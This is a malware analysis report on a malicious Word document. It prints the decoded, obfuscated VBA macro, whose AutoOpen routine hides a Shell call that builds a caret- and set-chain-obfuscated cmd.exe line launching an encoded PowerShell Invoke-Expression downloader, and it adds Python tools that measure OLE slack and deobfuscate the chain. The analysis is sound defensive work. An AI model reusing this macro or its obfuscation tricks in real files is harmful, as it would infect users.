Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6a5cf01bd4902de7…

MALICIOUS

Office (OLE)

Size: 94.2 KB (96,512 bytes)
Created: 2018-06-06 06:39:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: c5391ad890b25646970095a8119106ec
SHA-1: 36a204efad9bf6237e8e28d6d9a3a6c0bb9c508c
SHA-256: 6a5cf01bd4902de712077cb12b65be654bb86c6cb18c79c368b20b618db76f97
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is a Word document (OLE/CFB container) carrying a VBA project with a Sub Autoopen() entry point, so the macro runs as soon as a user opens the file with macros enabled. Autoopen calls mPDjjDmk, which passes a string to Shell() with a window-style argument of 57795 - 57795 = 0 (vbHide), i.e. the child process starts without a visible window. The argument is built from string fragments returned by CGrWHtscHf and XNbIiwF; the surrounding Hex/Cos/CDate statements and the never-assigned variables are padding (under On Error Resume Next an unassigned Variant is Empty and contributes nothing to the concatenation). Read together, the fragments form a cmd.exe command line: a caret-broken %comSpec% (the caret is cmd.exe's escape character and is stripped during parsing), the /V switch to enable delayed expansion, and a /c chain of set statements whose variable names are themselves wrapped in percent signs so that they survive the first expansion pass; the !...! references at the end of the chain reassemble the word powershell, followed by -e and a base64 blob. The visible prefix of that blob decodes (UTF-16LE) to `. ( $pshomE[4]+$psHOme[30]+'X') (nEW-ob`, which, with the default $PSHOME of the Windows PowerShell 5.x host, indexes the path string to spell ieX (Invoke-Expression) and applies it to a New-Object expression; the remainder of the script is cut off in the preview, so the download or execution target cannot be read from this report. The OLE slack finding is a size mismatch only: no shellcode or parser-exploit trigger was carved from the unallocated region, so the T1203 mapping appears to rest on that heuristic alone, while the MALICIOUS verdict is carried by the macro itself.

Heuristics 6

  • VBA macros detected (severity: medium; 2 related findings; rule OLE_VBA_MACROS)
    The document contains VBA macro code; the decoded source is listed under Extracted artifacts.
  • Shell() call in VBA (severity: critical; rule OLE_VBA_SHELL)
    The macro calls Shell(), which starts an external process. Here the command string is assembled at run time from string fragments spread across several functions, and the window-style argument evaluates to 0 (vbHide).
  • AutoOpen macro (severity: high; rule OLE_VBA_AUTOOPEN)
    Sub Autoopen() is an auto-execution entry point: Word runs it when the document is opened, provided macros are enabled.
  • OLE document has large unaccounted-for region (severity: high; rule OLE_SLACK_ANOMALY)
    The OLE file is 96,512 bytes, but its declared streams total only 35,644 bytes; the remaining 60,868 bytes (63%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). Unallocated sectors can also be left behind by ordinary editing and saving, so the finding corroborates rather than proves; nothing was carved from this region in the present analysis (the only extracted artifact is the macro source).
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's generic description states that no modern VBA project was recovered and no stronger macro-virus family marker was present; in this sample a VBA project was in fact recovered (see OLE_VBA_MACROS), so here the marker simply restates the AutoOpen finding. It is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard XML namespace URI of the Office Open XML DrawingML schema, present in embedded drawing markup; it is not a network indicator and should not be treated as a contact address.
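The OLE_SLACK_ANOMALY numbers above come from comparing the container's size with the sizes its directory declares. The following Python, added here as an illustration and not the analysis platform's own code, reads the compound-file header, FAT and directory with the standard library only and reports both the report's metric (bytes outside any declared stream) and the stricter one (bytes in sectors the FAT marks free). Because no sample file ships with this page, a minimal CFB v3 image is constructed inline (build_cfb, a constructed fixture with one stream named WordDocument and a configurable run of free sectors); the function names are the example's own. It follows only the 109 DIFAT entries in the header, which covers files of roughly 7 MB at 512-byte sectors.

```python
import struct

SIG = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
SECT = 512                 # sector size of the constructed v3 fixture
ENDOFCHAIN = 0xFFFFFFFE
FREESECT = 0xFFFFFFFF
FATSECT = 0xFFFFFFFD
NOSTREAM = 0xFFFFFFFF


def ole_slack(data: bytes) -> dict:
    """Measure how much of a compound file lies outside its declared streams.

    nonstream_bytes is the report's metric (file size minus the sum of declared
    stream sizes); unallocated_bytes counts sectors the FAT marks FREESECT plus
    any partial trailing sector. Only the header's 109 DIFAT entries are read.
    """
    if data[:8] != SIG:
        raise ValueError("not a compound file")
    major, = struct.unpack_from("<H", data, 0x1A)
    shift, = struct.unpack_from("<H", data, 0x1E)
    sect = 1 << shift
    num_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    difat = struct.unpack_from("<109I", data, 0x4C)
    fat = []
    for s in difat[:num_fat]:                       # sector N starts at (N+1)*sect
        fat += struct.unpack_from(f"<{sect // 4}I", data, (s + 1) * sect)

    declared = 0
    s, seen = first_dir, set()
    while s < len(fat) and s not in seen:           # walk the directory chain
        seen.add(s)
        base = (s + 1) * sect
        for i in range(sect // 128):
            e = base + i * 128
            if data[e + 66] == 2:                   # entry type 2 = stream
                size, = struct.unpack_from("<Q", data, e + 120)
                declared += size if major == 4 else size & 0xFFFFFFFF
        s = fat[s]

    body = len(data) - sect                         # everything after the header
    free = sum(sect for i in range(body // sect)
               if i >= len(fat) or fat[i] == FREESECT)
    free += body % sect
    return {
        "file_size": len(data),
        "declared_stream_bytes": declared,
        "nonstream_bytes": len(data) - declared,
        "unallocated_bytes": free,
        "unallocated_pct": round(100.0 * free / len(data), 1),
    }


def _dir_entry(name, etype, child=NOSTREAM, start=ENDOFCHAIN, size=0) -> bytes:
    """One 128-byte directory entry for the constructed fixture."""
    e = bytearray(128)
    n = name.encode("utf-16-le") + b"\x00\x00"
    e[: len(n)] = n
    struct.pack_into("<HBBIII", e, 64, len(n), etype, 1, NOSTREAM, NOSTREAM, child)
    struct.pack_into("<IQ", e, 116, start, size)
    return bytes(e)


def build_cfb(stream_data: bytes, trailing_free_sectors: int) -> bytes:
    """Constructed CFB v3 fixture: header, FAT in sector 0, directory in
    sector 1, one stream ("WordDocument") from sector 2 on, then a run of
    sectors the FAT marks free, which is where unaccounted-for data would sit."""
    n = -(-len(stream_data) // SECT)
    fat = [FATSECT, ENDOFCHAIN] + [3 + i for i in range(n - 1)] + [ENDOFCHAIN]
    fat += [FREESECT] * (SECT // 4 - len(fat))
    hdr = bytearray(SECT)
    hdr[:8] = SIG
    # minor, major, byte order, sector shift, mini shift, then the nine DWORDs:
    # dir sector count (0 for v3), FAT sector count, first dir sector,
    # transaction, mini cutoff, first mini FAT, mini FAT count, first DIFAT, DIFAT count
    struct.pack_into("<HHHHH6xIIIIIIIII", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6,
                     0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", hdr, 0x4C, 0, *([FREESECT] * 108))
    directory = (_dir_entry("Root Entry", 5, child=1)
                 + _dir_entry("WordDocument", 2, start=2, size=len(stream_data))
                 + bytes(2 * 128))
    stream = stream_data + bytes(n * SECT - len(stream_data))
    return (bytes(hdr) + struct.pack(f"<{SECT // 4}I", *fat) + directory
            + stream + bytes(trailing_free_sectors * SECT))


if __name__ == "__main__":
    print(ole_slack(build_cfb(b"A" * 4096, trailing_free_sectors=20)))
```

Against a real sample the two numbers usually differ: nonstream_bytes also counts the header, FAT and directory sectors, which is why it should be read as a ratio rather than an absolute, while unallocated_bytes isolates the region a carver would actually scan for XOR-encoded payloads.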

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11375 bytes
SHA-256: 2ee270d9f7960718c953ca2fc149c31adb097c22312bea09ba7f9e6193e512bc

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ziuMCubYl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function mPDjjDmk()
On Error Resume Next
Diuml = Hex(GBzLMm + Hex(rKYjX) * 99339 + Round(wwHpaK))
JCtSvj = Cos(TEPcE)
sdiSR = CDate(nRCfHV)
hGGbEL = Cos(wwwEtR)
KXFJE = Hex(nDTSp + Hex(mWcHX) * 72078 + Round(LwtMdK))
dQviZ = Cos(zhduw)
DDwim = CDate(ljYETo)
TwGIQL = Cos(wnpXHp)
mPDjjDmk = KfIsSUPSYqX + Shell(TFZjUpY + Chr(RuLijJzspUT + vbKeyC + KIbhNo) + CGrWHtscHf + XNbIiwF + WZMXTuZ + MzwAiX + jTJBQjBtJwj + hDJrzqizz, 57795 - 57795)
QYEtiK = Hex(htPUH + Hex(risYw) * 13397 + Round(GctZM))
UXQNZW = Cos(vVHTLl)
alDqnJ = CDate(kUvRaA)
mnffhz = Cos(dRfqwJ)
End Function
Sub Autoopen()
On Error Resume Next
WWYMLc = Hex(VZCmCw + Hex(DVwwVK) * 17650 + Round(coiloz))
XApAJ = Cos(zWEPY)
QOcsi = CDate(Fawjr)
zUoujh = Cos(oiBCCw)
mPDjjDmk
nWFwr = Hex(zzsTzv + Hex(ijWWoJ) * 24390 + Round(paCnW))
khOMaw = Cos(PiUwrH)
zbUvoi = CDate(EHfNtj)
wwDLV = Cos(MSdHYz)
End Sub


Attribute VB_Name = "SABYzBjBNF"
Function CGrWHtscHf()
On Error Resume Next
KSiNN = Hex(JGsoSt + Hex(AlkQK) * 31521 + Round(hULCMB))
pAEfi = Cos(XtUFZ)
ljuVnH = CDate(YGRMZ)
PBhqGb = Cos(MKUFo)
Riolf = "md plP" + "JIwiIqinJo KjS" + "jWfIMmfwB" + "Mp" + "OtocRa" + "sZ aSNWcuBclOtb" + " &   "
nqdGQ = Hex(qSfDnz + Hex(vscOX) * 76467 + Round(jPCqDN))
ZiaMoj = Cos(TivzAh)
jkzuqi = CDate(IjwzRK)
XnnDDB = Cos(oErwS)
jwSRmihv = "  %^c^o^m^S^p^E" + "^c^%     %" + "^c" + "^o^m^" + "S^p^E^c^%     " + "/V    "
bNhOWG = Hex(AfEwMf + Hex(QuiPWW) * 5287 + Round(qIwzjR))
jGvYpF = Cos(CiaLPb)
jqqYEB = CDate(Zbbvqf)
YRZZd = Cos(wzAop)
wDsHPqEDcD = "     /" + "c         " + "  set %Zj" + "Rdi"
VrwoKH = Hex(DGRFZb + Hex(wGiTc) * 97515 + Round(YdQAml))
tmqCi = Cos(fBcmR)
PcPHMA = CDate(NKsSjL)
QwOjoY = Cos(IJUbD)
NQHsKQw = "cwjK" + "juVSbp%=jWC" + "RJfIESlj" + "sd" + "W&&set %Haoz" + "LirSU" + "Y%=p&&set " + "%R"
NkzdrC = Hex(jzIWDz + Hex(YIBUJq) * 83128 + Round(jnwwsR))
TvjJJ = Cos(dMOaiW)
Snrco = CDate(wzHzSM)
QBKhtK = Cos(ciNqu)
atDqHOuLb = "asCRowiY" + "Ajd%=o^w&&se" + "t %qnTO" + "oMXz" + "iztpbuX%" + "=EAECvOL" + "bR"
Dvwnuf = Hex(jivvT + Hex(ITHLv) * 26934 + Round(KUbCjj))
zfnaB = Cos(whDDUF)
sQlFON = CDate(BDUSSc)
fjTtGN = Cos(UDqVu)
CYWYub = "uXML" + "&&set %puEunRU" + "Ff" + "Wk%=!%Haoz" + "LirSUY%!&&" + "set %w" + "tGGopHBDn" + "cchoE%=UDOja"
LaQErp = Hex(EuiWnS + Hex(SvLVHZ) * 70666 + Round(wjJNs))
YMvkUc = Cos(anPbc)
tlAwF = CDate(PtYrVN)
Ascjv = Cos(wzfhnm)
vwzDVWp = "hinb" + "a&&set %Xv" + "FNKkK%=e^r&&" + "set " + "%jGiZjiUBlt" + "Lqw%=!"
qZrIw = Hex(fYrhzn + Hex(ZdiAU) * 49262 + Round(zbfwH))
wjBND = Cos(KmzqC)
vbiwJ = CDate(ftrET)
fNNPU = Cos(usAcz)
JDZSOM = "%RasCRowiYAj" + "d%!&&set %" + "PFFRmNJkT" + "GtLiR%=s&&se" + "t %bbszuoKomE" + "njnE" + "Q%=ANbZOaH" + "DzqJf"
WddjcR = Hex(mjkYzo + Hex(STSOc) * 84618 + Round(kiqzu))
ivJPT = Cos(jafhvQ)
cjkuoP = CDate(RwaamA)
mlunj = Cos(zuqXUF)
irJWhFOjVm = "k&&set %idTADM" + "qVb%=he&&" + "set %kbPYdH" + "kNrBVmkf%=ll&&"
CGrWHtscHf = Riolf + jwSRmihv + wDsHPqEDcD + NQHsKQw + atDqHOuLb + CYWYub + vwzDVWp + JDZSOM + irJWhFOjVm
End Function
Function XNbIiwF()
On Error Resume Next
EcmlX = Hex(BPjznB + Hex(TAlUjc) * 36357 + Round(zokuL))
ahpNai = Cos(WoJpCo)
pGlHlz = CDate(wIWor)
tHnCqM = Cos(bhqmN)
bnViF = "!%" + "puEunRUFfWk%!" + "!%jGi" + "ZjiUBltLqw%!!" + "%XvFNKkK%!!%" + "PFFR" + "mNJkTGtLiR" + "%!!%i" + "dTADMqVb%!!%"
nwMbf = Hex(oUkrCd + Hex(LSbZT) * 49445 + Round(wCPAHw))
XXHPzt = Cos(LSmjq)
DSJPl = CDate(hAzzI)
MfWlj = Cos(UhpQz)
Muibld = "kbPYdHkN" + "rBVmk" + "f%!  -e LgAgACg" + "AIAAkAHAAcwBoA" + "G8AbQBFAFsANA" + "BdACsAJABw" + "AHMASABPAG0AZQ"
bCjqzA = Hex(sdSiit + Hex(PjQqaX) * 97018 + Round(nNwalb))
JRmUj = Cos(iorAwJ)
tuAsr = CDate(vlQzqZ)
iPWuYP = Cos(fTAsJ)
wHnTwSm = "BbADMA" + "MABdACsA" + "Jw" + "BY" + "ACcAKQAgACgAbgB" + "FAFcALQBvAG" + "IAag
... (truncated)
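The command line that Shell() receives can be recovered without executing anything by modelling the few cmd.exe rules the chain relies on. The following Python, added here as an example and not part of the report or of oletools, assembles that string by hand from the fragments in CGrWHtscHf and XNbIiwF above (the leading C from Chr(vbKeyC); the base64 cut where the preview is truncated), then emulates percent expansion with undefined names left literal, caret removal, the set chain, /V delayed expansion, and finally decodes the -e argument. The $PSHOME path used to resolve the $pshome[4]+$pshome[30] opener is the default Windows PowerShell 5.x install path and is an assumption; SAMPLE_CMDLINE, emulate_set_chain, decode_encoded_command, resolve_pshome_alias and analyze are the example's own names. The emulation covers only the subset of cmd.exe semantics this sample uses, not the full parser.

```python
import base64
import re

# Command line handed to Shell(), assembled by hand from the string fragments
# in CGrWHtscHf and XNbIiwF in the macro dump above. The leading "C" is
# Chr(vbKeyC); the never-assigned Variants are Empty and add nothing; the
# base64 stops where the report's preview is truncated.
SAMPLE_CMDLINE = (
    "Cmd plPJIwiIqinJo KjSjWfIMmfwBMpOtocRasZ aSNWcuBclOtb &   "
    "  %^c^o^m^S^p^E^c^%     %^c^o^m^S^p^E^c^%     /V    "
    "     /c           set %ZjRdi"
    "cwjKjuVSbp%=jWCRJfIESljsdW&&set %HaozLirSUY%=p&&set %R"
    "asCRowiYAjd%=o^w&&set %qnTOoMXziztpbuX%=EAECvOLbR"
    "uXML&&set %puEunRUFfWk%=!%HaozLirSUY%!&&set %wtGGopHBDncchoE%=UDOja"
    "hinba&&set %XvFNKkK%=e^r&&set %jGiZjiUBltLqw%=!"
    "%RasCRowiYAjd%!&&set %PFFRmNJkTGtLiR%=s&&set %bbszuoKomEnjnEQ%=ANbZOaHDzqJf"
    "k&&set %idTADMqVb%=he&&set %kbPYdHkNrBVmkf%=ll&&"
    "!%puEunRUFfWk%!!%jGiZjiUBltLqw%!!%XvFNKkK%!!%PFFRmNJkTGtLiR%!!%idTADMqVb%!!%"
    "kbPYdHkNrBVmkf%!  -e LgAgACgAIAAkAHAAcwBoAG8AbQBFAFsANABdACsAJABwAHMASABPAG0AZQ"
    "BbADMAMABdACsAJwBYACcAKQAgACgAbgBFAFcALQBvAGIAag"
)

# Assumption: the stock Windows PowerShell 5.x host path, used only to
# resolve the $pshome[i]+$pshome[j] indexing trick.
DEFAULT_PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"


def split_commands(line: str) -> list:
    """Split on unescaped '&' / '&&' and drop carets, cmd.exe's escape
    character (a caret outside quotes just yields the next character)."""
    parts, cur, i = [], [], 0
    while i < len(line):
        ch = line[i]
        if ch == "^" and i + 1 < len(line):
            cur.append(line[i + 1])
            i += 2
            continue
        if ch == "&":
            parts.append("".join(cur))
            cur = []
            i += 1
            continue
        cur.append(ch)
        i += 1
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]


def percent_expand(line: str, env: dict) -> str:
    """Phase-1 %NAME% expansion on a command line (not a batch file): a
    reference to an undefined name stays verbatim, which is what lets the
    sample define variables literally called '%HaozLirSUY%' and so on."""
    return re.sub(r"%([^%]*)%",
                  lambda m: env.get(m.group(1).upper(), m.group(0)), line)


def delayed_expand(text: str, env: dict) -> str:
    """!NAME! expansion, enabled by /V; it runs when each command executes,
    so values set earlier on the same line are visible. Undefined names
    expand to nothing."""
    return re.sub(r"!([^!]*)!", lambda m: env.get(m.group(1).upper(), ""), text)


def emulate_set_chain(cmdline: str, env=None):
    """Run the part after the /c switch through the emulation. Returns the
    final non-set command (whitespace-normalised) and the resulting env."""
    env = {k.upper(): v for k, v in (env or {}).items()}
    m = re.search(r"\s/[cC]\s+", cmdline)
    tail = cmdline[m.end():] if m else cmdline
    tail = percent_expand(tail, env)          # parse-time pass, before any set runs
    final = ""
    for cmd in split_commands(tail):
        cmd = delayed_expand(cmd, env)        # execution-time pass, per command
        m = re.match(r"(?is)set\s+([^=]+)=(.*)", cmd)
        if m:
            env[m.group(1).strip().upper()] = m.group(2)
        else:
            final = " ".join(cmd.split())
    return final, env


def decode_encoded_command(cmdline: str):
    """Decode a PowerShell -e / -enc / -EncodedCommand argument: base64 of a
    UTF-16LE string. A truncated blob is padded and a dangling byte dropped."""
    m = re.search(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")


def resolve_pshome_alias(script: str, pshome: str = DEFAULT_PSHOME):
    """Resolve the `.( $pshome[i]+$pshome[j]+'X' )` opener: it indexes the
    $PSHOME path string to spell the command name the script then invokes."""
    m = re.match(r"(?i)\.\s*\(\s*\$pshome\[(\d+)\]\+\$pshome\[(\d+)\]\+'(\w)'\s*\)",
                 script or "")
    if not m:
        return None
    return pshome[int(m.group(1))] + pshome[int(m.group(2))] + m.group(3)


def analyze(cmdline: str = SAMPLE_CMDLINE) -> dict:
    final, env = emulate_set_chain(cmdline)
    script = decode_encoded_command(final)
    return {"command": final, "decoded_prefix": script,
            "opener_resolves_to": resolve_pshome_alias(script)}


if __name__ == "__main__":
    for key, value in analyze().items():
        print(f"{key}: {value}")
```

analyze() returns the recovered `powershell -e ...` line, the decoded UTF-16LE prefix and the command name the opener spells (ieX, i.e. Invoke-Expression, since PowerShell command names are case-insensitive). The same functions apply to other set-chain droppers that use the percent-in-name and delayed-expansion tricks; a blob that is not truncated decodes to the full script.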